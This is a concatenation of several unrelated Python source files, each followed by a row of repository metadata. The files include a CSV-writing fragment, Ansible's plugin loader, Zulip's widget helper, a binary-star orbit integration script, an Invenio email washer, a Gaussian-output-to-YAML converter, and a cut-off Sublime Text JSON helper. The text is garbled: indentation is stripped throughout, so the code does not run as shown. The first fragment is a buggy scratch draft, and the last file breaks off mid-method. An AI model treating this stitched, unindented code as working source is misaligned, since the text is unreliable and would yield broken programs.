c = csv.writer(open("BAMS_Formatted_Data.csv","wb"))
c.writerows(qres.result)
# skip a row
# open the file
# allow program to enter loop and continue to open and insert data into the file
# Experimental -- best working yet
#########################################################################################
with open('BAMS_Formatted_Data.csv', 'wb') as f:
BAMS_Dict = {"Subject": qres.result[0][0], "Predicate": qres.result[0][1], "Object": qres.result[0][2]}
w = csv.DictWriter(f, BAMS_Dict.keys())
w.writeheader()
w.writerow(BAMS_Dict)
for r in qres.result:
c = csv.writer(open("BAMS_Formatted_Data.csv","wb"))
c.writerows(qres.result)
#w.writerows(qres.result)
#########################################################################################
#########################################################################################
#with open('mycsvfileV1.csv', 'wb') as f: # Just use 'w' mode in 3.x
with open('BAMS_Formatted_Data.csv', 'wb') as f: # Just use 'w' mode in 3.x
#First Entire Triple, Second Entire Triple, Third Entire Triple.....
#BAMS_Dict = {"Subject": qres.result[0], "Predicate": qres.result[1], "Object": qres.result[2]}
#Subject Of First Triple, Predicate Of First Triple, Object Of First Triple.....
BAMS_Dict = {"Subject": qres.result[0][0], "Predicate": qres.result[0][1], "Object": qres.result[0][2]}
w = csv.DictWriter(f, BAMS_Dict.keys())
w.writeheader()
w.writerow(BAMS_Dict)
#Check To See If A DictWriter Library Of Some Sort Is Required For Access To These Methods
#for row in BAMS_DICT:
#out_f.write("%s%s" %(delimiter.join([row[name] for name in f]), lineterminator))
#Left off with this vvvvvvvvvv
#DictWriter.writerows(...) | mit | 5,022,078,696,733,141,000 | 25.644128 | 110 | 0.62303 | false | 3.173379 | false | false | false |
kapilt/ansible | lib/ansible/plugins/__init__.py | 24 | 15677 | # (c) 2012, Daniel Hokka Zakrisson <[email protected]>
# (c) 2012-2014, Michael DeHaan <[email protected]> and others
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import glob
import imp
import inspect
import os
import os.path
import sys
import warnings
from collections import defaultdict
from ansible import constants as C
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
# Global so that all instances of a PluginLoader will share the caches
MODULE_CACHE = {}
PATH_CACHE = {}
PLUGIN_PATH_CACHE = {}
def get_all_plugin_loaders():
return [(name, obj) for (name, obj) in inspect.getmembers(sys.modules[__name__]) if isinstance(obj, PluginLoader)]
class PluginLoader:
'''
PluginLoader loads plugins from the configured plugin directories.
It searches for plugins by iterating through the combined list of
play basedirs, configured paths, and the python path.
The first match is used.
'''
def __init__(self, class_name, package, config, subdir, aliases={}, required_base_class=None):
self.class_name = class_name
self.base_class = required_base_class
self.package = package
self.config = config
self.subdir = subdir
self.aliases = aliases
if not class_name in MODULE_CACHE:
MODULE_CACHE[class_name] = {}
if not class_name in PATH_CACHE:
PATH_CACHE[class_name] = None
if not class_name in PLUGIN_PATH_CACHE:
PLUGIN_PATH_CACHE[class_name] = defaultdict(dict)
self._module_cache = MODULE_CACHE[class_name]
self._paths = PATH_CACHE[class_name]
self._plugin_path_cache = PLUGIN_PATH_CACHE[class_name]
self._extra_dirs = []
self._searched_paths = set()
def __setstate__(self, data):
'''
Deserializer.
'''
class_name = data.get('class_name')
package = data.get('package')
config = data.get('config')
subdir = data.get('subdir')
aliases = data.get('aliases')
base_class = data.get('base_class')
PATH_CACHE[class_name] = data.get('PATH_CACHE')
PLUGIN_PATH_CACHE[class_name] = data.get('PLUGIN_PATH_CACHE')
self.__init__(class_name, package, config, subdir, aliases, base_class)
self._extra_dirs = data.get('_extra_dirs', [])
self._searched_paths = data.get('_searched_paths', set())
def __getstate__(self):
'''
Serializer.
'''
return dict(
class_name = self.class_name,
base_class = self.base_class,
package = self.package,
config = self.config,
subdir = self.subdir,
aliases = self.aliases,
_extra_dirs = self._extra_dirs,
_searched_paths = self._searched_paths,
PATH_CACHE = PATH_CACHE[self.class_name],
PLUGIN_PATH_CACHE = PLUGIN_PATH_CACHE[self.class_name],
)
def print_paths(self):
''' Returns a string suitable for printing of the search path '''
# Uses a list to get the order right
ret = []
for i in self._get_paths():
if i not in ret:
ret.append(i)
return os.pathsep.join(ret)
def _all_directories(self, dir):
results = []
results.append(dir)
for root, subdirs, files in os.walk(dir):
if '__init__.py' in files:
for x in subdirs:
results.append(os.path.join(root,x))
return results
def _get_package_paths(self):
''' Gets the path of a Python package '''
paths = []
if not self.package:
return []
if not hasattr(self, 'package_path'):
m = __import__(self.package)
parts = self.package.split('.')[1:]
self.package_path = os.path.join(os.path.dirname(m.__file__), *parts)
paths.extend(self._all_directories(self.package_path))
return paths
def _get_paths(self):
''' Return a list of paths to search for plugins in '''
if self._paths is not None:
return self._paths
ret = self._extra_dirs[:]
# look in any configured plugin paths, allow one level deep for subcategories
if self.config is not None:
configured_paths = self.config.split(os.pathsep)
for path in configured_paths:
path = os.path.realpath(os.path.expanduser(path))
contents = glob.glob("%s/*" % path) + glob.glob("%s/*/*" % path)
for c in contents:
if os.path.isdir(c) and c not in ret:
ret.append(c)
if path not in ret:
ret.append(path)
# look for any plugins installed in the package subtree
ret.extend(self._get_package_paths())
# HACK: because powershell modules are in the same directory
# hierarchy as other modules we have to process them last. This is
# because powershell only works on windows but the other modules work
# anywhere (possibly including windows if the correct language
# interpreter is installed). the non-powershell modules can have any
# file extension and thus powershell modules are picked up in that.
# The non-hack way to fix this is to have powershell modules be
# a different PluginLoader/ModuleLoader. But that requires changing
# other things too (known thing to change would be PATHS_CACHE,
# PLUGIN_PATHS_CACHE, and MODULE_CACHE. Since those three dicts key
# on the class_name and neither regular modules nor powershell modules
# would have class_names, they would not work as written.
reordered_paths = []
win_dirs = []
for path in ret:
if path.endswith('windows'):
win_dirs.append(path)
else:
reordered_paths.append(path)
reordered_paths.extend(win_dirs)
# cache and return the result
self._paths = reordered_paths
return reordered_paths
def add_directory(self, directory, with_subdir=False):
''' Adds an additional directory to the search path '''
directory = os.path.realpath(directory)
if directory is not None:
if with_subdir:
directory = os.path.join(directory, self.subdir)
if directory not in self._extra_dirs:
# append the directory and invalidate the path cache
self._extra_dirs.append(directory)
self._paths = None
def find_plugin(self, name, mod_type=''):
''' Find a plugin named name '''
if mod_type:
suffix = mod_type
elif self.class_name:
# Ansible plugins that run in the controller process (most plugins)
suffix = '.py'
else:
# Only Ansible Modules. Ansible modules can be any executable so
# they can have any suffix
suffix = ''
# The particular cache to look for modules within. This matches the
# requested mod_type
pull_cache = self._plugin_path_cache[suffix]
try:
return pull_cache[name]
except KeyError:
# Cache miss. Now let's find the plugin
pass
# TODO: Instead of using the self._paths cache (PATH_CACHE) and
# self._searched_paths we could use an iterator. Before enabling that
# we need to make sure we don't want to add additional directories
# (add_directory()) once we start using the iterator. Currently, it
# looks like _get_paths() never forces a cache refresh so if we expect
# additional directories to be added later, it is buggy.
for path in (p for p in self._get_paths() if p not in self._searched_paths and os.path.isdir(p)):
try:
full_paths = (os.path.join(path, f) for f in os.listdir(path))
except OSError as e:
display.warning("Error accessing plugin paths: %s" % str(e))
for full_path in (f for f in full_paths if os.path.isfile(f) and not f.endswith('__init__.py')):
full_name = os.path.basename(full_path)
# HACK: We have no way of executing python byte
# compiled files as ansible modules so specifically exclude them
if full_path.endswith(('.pyc', '.pyo')):
continue
splitname = os.path.splitext(full_name)
base_name = splitname[0]
try:
extension = splitname[1]
except IndexError:
extension = ''
# Module found, now enter it into the caches that match
# this file
if base_name not in self._plugin_path_cache['']:
self._plugin_path_cache[''][base_name] = full_path
if full_name not in self._plugin_path_cache['']:
self._plugin_path_cache[''][full_name] = full_path
if base_name not in self._plugin_path_cache[extension]:
self._plugin_path_cache[extension][base_name] = full_path
if full_name not in self._plugin_path_cache[extension]:
self._plugin_path_cache[extension][full_name] = full_path
self._searched_paths.add(path)
try:
return pull_cache[name]
except KeyError:
# Didn't find the plugin in this directory. Load modules from
# the next one
pass
# if nothing is found, try finding alias/deprecated
if not name.startswith('_'):
alias_name = '_' + name
# We've already cached all the paths at this point
if alias_name in pull_cache:
if not os.path.islink(pull_cache[alias_name]):
display.deprecated('%s is kept for backwards compatibility '
'but usage is discouraged. The module '
'documentation details page may explain '
'more about this rationale.' %
name.lstrip('_'))
return pull_cache[alias_name]
return None
def has_plugin(self, name):
''' Checks if a plugin named name exists '''
return self.find_plugin(name) is not None
__contains__ = has_plugin
def _load_module_source(self, name, path):
if name in sys.modules:
# See https://github.com/ansible/ansible/issues/13110
return sys.modules[name]
with warnings.catch_warnings():
warnings.simplefilter("ignore", RuntimeWarning)
with open(path, 'r') as module_file:
module = imp.load_source(name, path, module_file)
return module
def get(self, name, *args, **kwargs):
''' instantiates a plugin of the given name using arguments '''
if name in self.aliases:
name = self.aliases[name]
path = self.find_plugin(name)
if path is None:
return None
if path not in self._module_cache:
self._module_cache[path] = self._load_module_source('.'.join([self.package, name]), path)
if kwargs.get('class_only', False):
obj = getattr(self._module_cache[path], self.class_name)
else:
obj = getattr(self._module_cache[path], self.class_name)(*args, **kwargs)
if self.base_class and self.base_class not in [base.__name__ for base in obj.__class__.__bases__]:
return None
return obj
def all(self, *args, **kwargs):
''' instantiates all plugins with the same arguments '''
for i in self._get_paths():
matches = glob.glob(os.path.join(i, "*.py"))
matches.sort()
for path in matches:
name, _ = os.path.splitext(path)
if '__init__' in name:
continue
if path not in self._module_cache:
self._module_cache[path] = self._load_module_source(name, path)
if kwargs.get('class_only', False):
obj = getattr(self._module_cache[path], self.class_name)
else:
obj = getattr(self._module_cache[path], self.class_name)(*args, **kwargs)
if self.base_class and self.base_class not in [base.__name__ for base in obj.__class__.__bases__]:
continue
# set extra info on the module, in case we want it later
setattr(obj, '_original_path', path)
yield obj
action_loader = PluginLoader(
'ActionModule',
'ansible.plugins.action',
C.DEFAULT_ACTION_PLUGIN_PATH,
'action_plugins',
required_base_class='ActionBase',
)
cache_loader = PluginLoader(
'CacheModule',
'ansible.plugins.cache',
C.DEFAULT_CACHE_PLUGIN_PATH,
'cache_plugins',
)
callback_loader = PluginLoader(
'CallbackModule',
'ansible.plugins.callback',
C.DEFAULT_CALLBACK_PLUGIN_PATH,
'callback_plugins',
)
connection_loader = PluginLoader(
'Connection',
'ansible.plugins.connection',
C.DEFAULT_CONNECTION_PLUGIN_PATH,
'connection_plugins',
aliases={'paramiko': 'paramiko_ssh'},
required_base_class='ConnectionBase',
)
shell_loader = PluginLoader(
'ShellModule',
'ansible.plugins.shell',
'shell_plugins',
'shell_plugins',
)
module_loader = PluginLoader(
'',
'ansible.modules',
C.DEFAULT_MODULE_PATH,
'library',
)
lookup_loader = PluginLoader(
'LookupModule',
'ansible.plugins.lookup',
C.DEFAULT_LOOKUP_PLUGIN_PATH,
'lookup_plugins',
required_base_class='LookupBase',
)
vars_loader = PluginLoader(
'VarsModule',
'ansible.plugins.vars',
C.DEFAULT_VARS_PLUGIN_PATH,
'vars_plugins',
)
filter_loader = PluginLoader(
'FilterModule',
'ansible.plugins.filter',
C.DEFAULT_FILTER_PLUGIN_PATH,
'filter_plugins',
)
test_loader = PluginLoader(
'TestModule',
'ansible.plugins.test',
C.DEFAULT_TEST_PLUGIN_PATH,
'test_plugins'
)
fragment_loader = PluginLoader(
'ModuleDocFragment',
'ansible.utils.module_docs_fragments',
os.path.join(os.path.dirname(__file__), 'module_docs_fragments'),
'',
)
strategy_loader = PluginLoader(
'StrategyModule',
'ansible.plugins.strategy',
None,
'strategy_plugins',
required_base_class='StrategyBase',
)
| gpl-3.0 | -5,174,014,401,932,513,000 | 33.837778 | 118 | 0.58219 | false | 4.195076 | true | false | false |
andersk/zulip | zerver/lib/widget.py | 3 | 3306 | import json
import re
from typing import Any, Optional, Tuple
from zerver.lib.message import SendMessageRequest
from zerver.models import Message, SubMessage
def get_widget_data(content: str) -> Tuple[Optional[str], Optional[str]]:
valid_widget_types = ["poll", "todo"]
tokens = content.split(" ")
# tokens[0] will always exist
if tokens[0].startswith("/"):
widget_type = tokens[0][1:]
if widget_type in valid_widget_types:
remaining_content = content.replace(tokens[0], "", 1).strip()
extra_data = get_extra_data_from_widget_type(remaining_content, widget_type)
return widget_type, extra_data
return None, None
def get_extra_data_from_widget_type(content: str, widget_type: Optional[str]) -> Any:
if widget_type == "poll":
# This is used to extract the question from the poll command.
# The command '/poll question' will pre-set the question in the poll
lines = content.splitlines()
question = ""
options = []
if lines and lines[0]:
question = lines.pop(0).strip()
for line in lines:
# If someone is using the list syntax, we remove it
# before adding an option.
option = re.sub(r"(\s*[-*]?\s*)", "", line.strip(), 1)
if len(option) > 0:
options.append(option)
extra_data = {
"question": question,
"options": options,
}
return extra_data
return None
def do_widget_post_save_actions(send_request: SendMessageRequest) -> None:
"""
This code works with the web app; mobile and other
clients should also start supporting this soon.
"""
message_content = send_request.message.content
sender_id = send_request.message.sender_id
message_id = send_request.message.id
widget_type = None
extra_data = None
widget_type, extra_data = get_widget_data(message_content)
widget_content = send_request.widget_content
if widget_content is not None:
# Note that we validate this data in check_message,
# so we can trust it here.
widget_type = widget_content["widget_type"]
extra_data = widget_content["extra_data"]
if widget_type:
content = dict(
widget_type=widget_type,
extra_data=extra_data,
)
submessage = SubMessage(
sender_id=sender_id,
message_id=message_id,
msg_type="widget",
content=json.dumps(content),
)
submessage.save()
send_request.submessages = SubMessage.get_raw_db_rows([message_id])
def get_widget_type(*, message_id: int) -> Optional[str]:
submessage = (
SubMessage.objects.filter(
message_id=message_id,
msg_type="widget",
)
.only("content")
.first()
)
if submessage is None:
return None
try:
data = json.loads(submessage.content)
except Exception:
return None
try:
return data["widget_type"]
except Exception:
return None
def is_widget_message(message: Message) -> bool:
# Right now all messages that are widgetized use submessage, and vice versa.
return message.submessage_set.exists()
| apache-2.0 | -4,493,608,394,027,516,400 | 29.611111 | 88 | 0.605868 | false | 3.978339 | false | false | false |
hrichstein/phys_50733 | rh_project/polar_try.py | 1 | 5028 | import numpy as np
import matplotlib.pyplot as plt
# from scipy.constants import G
# Setting plotting parameters
from matplotlib import rc,rcParams
rc('text', usetex=True)
rc('axes', linewidth=2)
rc('font', weight='bold')
rc('font', **{'family': 'serif', 'serif':['Computer Modern']})
def find_vel_init(M1, M2, A):
period = np.sqrt(4 * np.pi**2 * A**3 * 365.25**2 / G / (M1 + M2)) # period in days
print(period)
v = 2 * np.pi * A / period # AU/days
return v
def orb_func(theta_arr):
# How far apart these are to begin with
# rsep = r**2 + r**2 - 2*r*r*np.cos((theta_arr[1]-theta_arr[0])*np.pi/180)
# print(rsep)
rsep = 0.2
# How much the angle changes
d_theta = G*(M1+M2)*r / rsep**2
d_theta = np.sqrt(G*M1*M2*rsep) / rsep**2 / np.sqrt(M1*M2/(M1+M2))
# print("Linear velocity is {0}".format(r*d_theta))
new_th_arr = d_theta + theta_arr
return new_th_arr
A = 0.2 # AU
r = A/2 # semi-major axis & radius
# G = 4 * np.pi**2
G = 4 * np.pi**2
a = 0
b = .05
N = 100000
h = (b-a)/N
M1 = 1
M2 = 1
print(find_vel_init(M1,M2,r))
print("AU / min")
tpoints = np.arange(a, b, h)
theta_1 = 0
theta_2 = 180
th_arr = np.array([theta_1, theta_2],dtype=float)
theta_points1 = [[] for tt in range(len(tpoints))]
theta_points2 = [[] for tt in range(len(tpoints))]
for tt in range(len(tpoints)):
theta_points1[tt] = th_arr[0]
theta_points2[tt] = th_arr[1]
k1 = h * orb_func(th_arr)
k2 = h * orb_func(th_arr + 0.5*k1)
k3 = h * orb_func(th_arr + 0.5*k2)
k4 = h * orb_func(th_arr + k3)
th_arr += (k1 + 2*k2 + 2*k3 + k4) / 6
xpoints1 = [[] for tt in range(len(tpoints))]
ypoints1 = [[] for tt in range(len(tpoints))]
xpoints2 = [[] for tt in range(len(tpoints))]
ypoints2 = [[] for tt in range(len(tpoints))]
for tt in range(len(tpoints)):
xpoints1[tt] = r * np.cos(theta_points1[tt] * np.pi/180)
ypoints1[tt] = r * np.sin(theta_points1[tt] * np.pi/180)
xpoints2[tt] = r * np.cos(theta_points2[tt] * np.pi/180)
ypoints2[tt] = r * np.sin(theta_points2[tt] * np.pi/180)
# r1 = np.array([(r*np.cos(theta_1*np.pi/180)), (r*np.sin(theta_1*np.pi/180))])
# r2 = np.array([(r*np.cos(theta_2*np.pi/180)), (r*np.sin(theta_2*np.pi/180))])
# def plan_accel(s1, s2, p1):
# """
# s1: array-like
# x and y position of star 1
# s2: array-like
# x and y position of star 2
# p1: array-like
# x and y position of planet
# M1: integer-like (global variable)
# solar mass of each star (they're equal)
# """
# a_x = (-G * M1 * (p1[0]-s1[0]) / (np.sqrt((p1[0] - s1[0])**2) +\
# (p1[1] - s1[1])**2)**3)\
# +(-G * M2 * (p1[0]-s2[0]) / (np.sqrt((p1[0] - s2[0])**2) +\
# (p1[1] - s2[1])**2)**3)
# a_y = (-G * M1 * (p1[1]-s1[1]) / (np.sqrt((p1[0] - s1[0])**2) +\
# (p1[1] - s1[1])**2)**3)\
# +(-G * M2 * (p1[1]-s2[1]) / (np.sqrt((p1[0] - s2[0])**2) +\
# (p1[1] - s2[1])**2)**3)
# accel_arr = np.array([a_x, a_y])
# return accel_arr
# def plan_fun(param_array, s1, s2):
# """
# param_array: array-like
# param_array[0] = position of planet
# param_array[1] = velocity of planet
# s1: array-like
# x, y position of star 1
# s2: array-like
# x, y position of star 2
# Each of the above is array form with x and y components
# h: float-like
# global variable timestep
# """
# x0 = param_array[0][0]
# y0 = param_array[0][1]
# vx0 = param_array[1][0]
# vy0 = param_array[1][1]
# dx = vx0 * h
# dy = vy0 * h
# d_pos = np.array([dx,dy])
# # print(s1)
# # print(s2)
# # print(param_array[0])
# accel_vals = plan_accel(s1,s2,param_array[0])
# dvx = accel_vals[0] * h
# dvy = accel_vals[1] * h
# d_vel = np.array([dvx,dvy])
# d_arr = np.array([d_pos, d_vel])
# return d_arr
# v_plan_init = find_vel_init(1,0,20)
# # Initial position
# pl_x0 = 2
# pl_y0 = 0
# pl_pos = np.array([pl_x0, pl_y0])
# # Initial Velocity
# pl_vx0 = 0
# pl_vy0 = v_plan_init
# pl_vel = np.array([pl_vx0, pl_vy0])
# plan_params = np.array([pl_pos, pl_vel])
# xpoints_p = [[] for tt in range(len(tpoints))]
# ypoints_p = [[] for tt in range(len(tpoints))]
# for tt in range(len(tpoints)):
# s1_pos = np.array([xpoints1[tt],ypoints1[tt]])
# s2_pos = np.array([xpoints2[tt],ypoints2[tt]])
# xpoints_p[tt] = plan_params[0][0]
# ypoints_p[tt] = plan_params[0][1]
# k1 = h * plan_fun(plan_params, s1_pos, s2_pos)
# k2 = h * plan_fun(plan_params + 0.5*k1, s1_pos, s2_pos)
# k3 = h * plan_fun(plan_params + 0.5*k2, s1_pos, s2_pos)
# k4 = h * plan_fun(plan_params + k3, s1_pos, s2_pos)
# plan_params += (k1 + 2*k2 + 2*k3 + k4) / 6
plt.plot(xpoints1,ypoints1, label="Star 1")
plt.plot(xpoints2,ypoints2, label="Star 2")
# plt.plot(xpoints_p,ypoints_p, label="Planet")
plt.legend()
plt.show()
# # # Positions for three bodies initially
# # s1_0x = s1[0]
# # s1_0y = s1[1]
# # s2_0x = s2[0]
# # s2_0y = s2[1]
# # p_x = p[0]
# # p_y = p[1]
# # Velocities for three bodies initially
# s1_0v_x = v_s1[0]
# s1_0v_y = v_s1[1]
# s2_0v_x = v_s2[0]
# s2_0v_y = v_s2[1]
# p_v_x = v_p[0]
# p_v_y = v_p[1] | mit | -1,545,803,270,774,261,200 | 21.55157 | 83 | 0.568218 | false | 2.009592 | false | false | false |
NikolaYolov/invenio_backup | modules/webcomment/lib/webcomment_washer.py | 3 | 1706 | from invenio.htmlutils import HTMLWasher
import htmlentitydefs
class EmailWasher(HTMLWasher):
"""
Wash comments before being send by email
"""
def handle_starttag(self, tag, attrs):
"""Function called for new opening tags"""
if tag.lower() in self.allowed_tag_whitelist:
if tag.lower() in ['ul', 'ol']:
self.result += '\n'
elif tag.lower() == 'li':
self.result += '* '
elif tag.lower() == 'a':
for (attr, value) in attrs:
if attr.lower() == 'href':
self.result += '<' + value + '>' + '('
def handle_endtag(self, tag):
"""Function called for ending of tags"""
if tag.lower() in self.allowed_tag_whitelist:
if tag.lower() in ['li', 'ul', 'ol']:
self.result += '\n'
elif tag.lower() == 'a':
self.result += ')'
def handle_startendtag(self, tag, attrs):
"""Function called for empty tags (e.g. <br />)"""
self.result += ""
def handle_charref(self, name):
"""Process character references of the form "&#ref;". Transform to text whenever possible."""
try:
self.result += unichr(int(name)).encode("utf-8")
except:
return
def handle_entityref(self, name):
"""Process a general entity reference of the form "&name;".
Transform to text whenever possible."""
char_code = htmlentitydefs.name2codepoint.get(name, None)
if char_code is not None:
try:
self.result += unichr(char_code).encode("utf-8")
except:
return
| gpl-2.0 | 786,151,141,965,397,000 | 34.541667 | 101 | 0.521688 | false | 4.181373 | false | false | false |
tschijnmo/FFOMP | FFOMP/ccutils/gau2yaml.py | 1 | 10855 | """
Output conversion for Gaussian
==============================
This module contains conversion utilities that is solely written for the
Gaussian computational chemistry program.
.. autosummary::
:toctree:
gauout2PESyaml
"""
import collections
import re
from collections import abc
import itertools
import numpy as np
try:
from yaml import CDumper as Dumper
except ImportError:
from yaml import Dumper
from yaml import dump, YAMLError
#
# The drive function
# ------------------
#
def gauout2PESyaml(gauout_name, yaml_name,
energy_patt=r'^ SCF Done[^=]+=(?P<energy>[^A]+)A\.U',
ref_energy=0.0, symbs=None, mols=None, add_info=None):
"""Converts a Gaussian output file to a PES YAML file
The atomic coordinates will be stored in the field ``atm_coords`` in input
orientation in units of Angstrom. The SCF energy will be stored as
``static_energy`` in units of eV. The forces will be stored in
``atm_foces`` in the unit of eV/Angstrom.
The atomic symbols and molecules will also be stored in ``atm_symbs`` and
``mols`` according to user input.
:param str gauout_name: The name of the Gaussian output file.
:param str yaml_name: The name of the YAML file to be written.
:param str energy_patt: The pattern that can be used to grab the raw energy
in Hartree. The energy needs to be in the named group ``energy`` and
the last line matching the pattern with search will be used. Default to
the SCF energy.
:param float ref_energy: The reference energy to be subtracted from the raw
energy, in Hartree.
:param symbs: The symbols for the atoms in the output. By default the
element symbol for the atomic numbers will be used. Or it can be given
as a callable which will be called with the atomic index number and the
default symbol to return the actual symbol of the atoms. An iterable
can be given directly as well.
:param mols: An iterable for the atomic indices of the molecules in the
system. Elements in the iterable can be another iterable to give the
actual indices of the atoms, or an integral number to show that the
next n atoms will be a molecule. By default there is going to be just
one molecule.
:param dict add_info: The dictionary of additional information to add.
:raises ValueError: if the input has got problems.
:raises IOError: if something is wrong with the files.
:returns: 0 for success.
"""
# Parse the Gaussian output.
parse_res = _parse_gauout(gauout_name, energy_patt)
# The result dictionary.
res = {}
# The coordinates.
res['atm_coords'] = parse_res.atm_coords.tolist()
# The energy.
res['static_energy'] = (
parse_res.static_energy - ref_energy
) * _HARTREE2EV
# The forces.
res['atm_forces'] = (
parse_res.atm_forces * _HARTREE_P_BOHR2EV_P_ANGS
).tolist()
atm_numbs = parse_res.atm_numbs
# The symbols.
res['atm_symbs'] = _gen_symbs(atm_numbs, symbs)
# The molecules.
res['mols'] = _gen_mols(atm_numbs, mols)
if add_info is not None:
res.update(add_info)
# Dump to the YAML file.
_dump2yaml(yaml_name, res)
return 0
#
# Some unit conversion constants
# ------------------------------
#
_HARTREE2EV = 27.21139
_HARTREE_P_BOHR2EV_P_ANGS = 51.42207
#
# Gaussian output parsing
# -----------------------
#
ParseRes = collections.namedtuple(
'ParseRes', [
'atm_coords',
'static_energy',
'atm_forces',
'atm_numbs',
]
)
def _parse_gauout(gauout_name, energy_patt):
"""Parses the given Gaussian output file
The results will be put in a named tuple. All units are *not* converted.
And tensor properties like coordinates and forces will be in numpy arrays.
:param str gauout_name: The name of the Gaussian output file to parse.
:param str energy_patt: The energy pattern to grab the energy.
:returns: The parse result.
"""
# Open and read the file.
try:
with open(gauout_name, 'r') as gauout:
lines = gauout.readlines()
except IOError:
raise
# Get the energy, the easiest one.
compiled_energy_patt = re.compile(energy_patt)
static_energy = None
for line in lines:
res = compiled_energy_patt.search(line)
if res is None:
continue
else:
static_energy = float(res.group('energy'))
continue
if static_energy is None:
raise ValueError(
'Energy failed to be read from {}'.format(gauout_name)
)
# Get the coordinates and the atomic numbers.
coords_lines = _get_lines_under_title(
lines, r'^ +Input orientation: *$', r'^ *\d'
)
atm_numbs = []
atm_coords = []
for line in coords_lines:
fields = line.split()
atm_numbs.append(
int(fields[1])
)
atm_coords.append(
[float(i) for i in fields[3:6]]
)
continue
atm_coords = np.array(atm_coords)
# Get the forces.
forces_lines = _get_lines_under_title(
lines, r'^ +\*+ +Axes restored to original set +\*+ *$', r'^ *\d'
)
atm_forces = []
for line in forces_lines:
fields = line.split()
atm_forces.append(
[float(i) for i in fields[2:5]]
)
continue
atm_forces = np.array(atm_forces)
return ParseRes(
atm_coords=atm_coords, static_energy=static_energy,
atm_forces=atm_forces, atm_numbs=atm_numbs,
)
def _get_lines_under_title(lines, title_patt, content_patt):
"""Gets the lines under a title
If multiple titles are found, only the lines in the last section will be
returned.
:param lines: A sequence of lines.
:param title_patt: The pattern for the title.
:param content_patt: The pattern for the content lines.
:raises ValueError: If the title cannot be found.
:returns: The content lines following the title.
"""
# Compile the given patterns
compiled_title_patt = re.compile(title_patt)
compiled_content_patt = re.compile(content_patt)
# Find the location of the title.
title_loc = None
for idx, line in enumerate(lines):
if compiled_title_patt.search(line) is not None:
title_loc = idx
continue
else:
continue
if title_loc is None:
raise ValueError(
'The given title {} failed to be found'.format(title_patt)
)
# Gather the content lines following the title.
content_lines = []
started = False
for line in lines[title_loc:]:
if compiled_content_patt.search(line) is None:
if started:
break
else:
continue
else:
content_lines.append(line)
if not started:
started = True
return content_lines
#
# Symbols and molecules generation
# --------------------------------
#
def _gen_symbs(atm_numbs, symbs):
"""Generates the atomic symbols
By default, the element symbols will be used. If iterable is given its
content will be directly used. If callable is given, it will be called with
atomic index and default symbol to get the actual symbol.
"""
if isinstance(symbs, abc.Iterable):
symbs = list(symbs)
if len(symbs) != len(atm_numbs):
raise ValueError(
'The given symbols does not match the number of atoms!'
)
else:
default_symbs = [
_ELEMENT_SYMBS[i] for i in atm_numbs
]
if symbs is None:
symbs = default_symbs
else:
symbs = [
symbs(idx, default_symb)
for idx, default_symb in enumerate(default_symbs)
]
return symbs
def _gen_mols(atm_numbs, mols):
"""Generates the nested molecules list"""
if mols is None:
return [i for i, _ in enumerate(atm_numbs)]
else:
ret_val = []
# Get the molecules list.
curr_atm = 0
for i in mols:
if isinstance(i, int):
ret_val.append(
list(range(curr_atm, curr_atm + i))
)
curr_atm += i
else:
ret_val.append(
list(i)
)
curr_atm = max(i)
continue
# Check the correctness.
for i, j in itertools.zip_longest(
range(0, len(atm_numbs)),
sorted(itertools.chain.from_iterable(ret_val))
):
if i != j:
raise ValueError(
'Incorrect molecule specification, atom {} not correctly '
'given!'.format(i)
)
continue
return ret_val
_ELEMENT_SYMBS = {
1: "H",
2: "He",
3: "Li",
4: "Be",
5: "B",
6: "C",
7: "N",
8: "O",
9: "F",
10: "Ne",
11: "Na",
12: "Mg",
13: "Al",
14: "Si",
15: "P",
16: "S",
17: "Cl",
18: "Ar",
19: "K",
20: "Ca",
21: "Sc",
22: "Ti",
23: "V",
24: "Cr",
25: "Mn",
26: "Fe",
27: "Co",
28: "Ni",
29: "Cu",
30: "Zn",
31: "Ga",
32: "Ge",
33: "As",
34: "Se",
35: "Br",
36: "Kr",
37: "Rb",
38: "Sr",
39: "Y",
40: "Zr",
41: "Nb",
42: "Mo",
43: "Tc",
44: "Ru",
45: "Rh",
46: "Pd",
47: "Ag",
48: "Cd",
49: "In",
50: "Sn",
51: "Sb",
52: "Te",
53: "I",
54: "Xe",
55: "Cs",
56: "Ba",
57: "La",
58: "Ce",
59: "Pr",
60: "Nd",
61: "Pm",
62: "Sm",
63: "Eu",
64: "Gd",
65: "Tb",
66: "Dy",
67: "Ho",
68: "Er",
69: "Tm",
70: "Yb",
71: "Lu",
72: "Hf",
73: "Ta",
74: "W",
75: "Re",
76: "Os",
77: "Ir",
78: "Pt",
79: "Au",
80: "Hg",
81: "Tl",
82: "Pb",
83: "Bi",
84: "Po",
85: "At",
86: "Rn",
87: "Fr",
88: "Ra",
89: "Ac",
90: "Th",
91: "Pa",
92: "U",
93: "Np",
94: "Pu",
95: "Am",
96: "Cm",
97: "Bk",
98: "Cf",
99: "Es",
}
#
# Output generation
# -----------------
#
def _dump2yaml(yaml_name, content):
"""Dumps the content dictionary into a YAML file with the given name"""
try:
with open(yaml_name, 'w') as yaml_file:
dump(content, stream=yaml_file, Dumper=Dumper)
except IOError:
raise IOError(
'Invalid output file {}'.format(yaml_name)
)
except YAMLError:
raise ValueError(
'Invalid data to be dumped by YAML:\n{!r}'.format(content)
)
| mit | 1,514,037,048,358,668,300 | 23.175947 | 79 | 0.551359 | false | 3.4736 | false | false | false |
randy3k/Project-Manager | json_file.py | 1 | 1374 | import sublime
import os
class JsonFile:
def __init__(self, fpath, encoding='utf-8'):
self.encoding = encoding
self.fpath = fpath
def load(self, default=[]):
self.fdir = os.path.dirname(self.fpath)
if not os.path.isdir(self.fdir):
os.makedirs(self.fdir)
if os.path.exists(self.fpath):
with open(self.fpath, mode='r', encoding=self.encoding) as f:
content = f.read()
try:
data = sublime.decode_value(content)
except Exception:
sublime.message_dialog('%s is bad!' % self.fpath)
raise
if not data:
data = default
else:
